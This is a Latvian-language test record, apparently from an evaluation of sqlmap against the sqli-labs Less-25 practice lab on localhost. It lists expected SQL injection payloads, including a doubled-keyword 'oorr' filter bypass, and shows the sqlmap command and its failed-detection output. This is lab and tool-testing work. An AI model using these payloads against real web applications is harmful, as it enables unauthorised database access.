=================================================================================
1. Īpašība: tiek nodzēsti no pieprasījuma atslēgvārdi "or" un "and", kļūdas gadījumā ziņojums parādās tur pat, kur rezultāts
2. Nepiciešams tampering: jā, --tamper=between
3. Sagaidāmais rezultāts: 
3.1. boolean-based: ?id=-1' oorr 1=1-- -
3.2. error-based: ?id=-1'
3.3. time-based: ?id=-1' oorr sleep(1)-- -
3.4. union: ?id=-1' union select 1,2,3-- -
4. Reālais rezultāts: redzams zemāk
5. Vidējais risinājuma ilgums: 11896281 nanosekundes
6. Palaistā komanda
sqlmap -u "http://localhost/sqli-labs/sqli-labs/Less-25/?id=1" -p id -risk=3 --level=5 --tamper=between

7. Jautājumi, kurus uzdeva SQLMap:
7.1. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
=================================================================================
false positive or unexploitable injection point detected
GET parameter 'id' does not seem to be injectable

all tested parameters do not appear to be injectable. Also, you can try to rerun by providing a valid value for option '--string' as perhaps the string you have chosen does not match exclusively True responses. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or swtich '--random-agent'

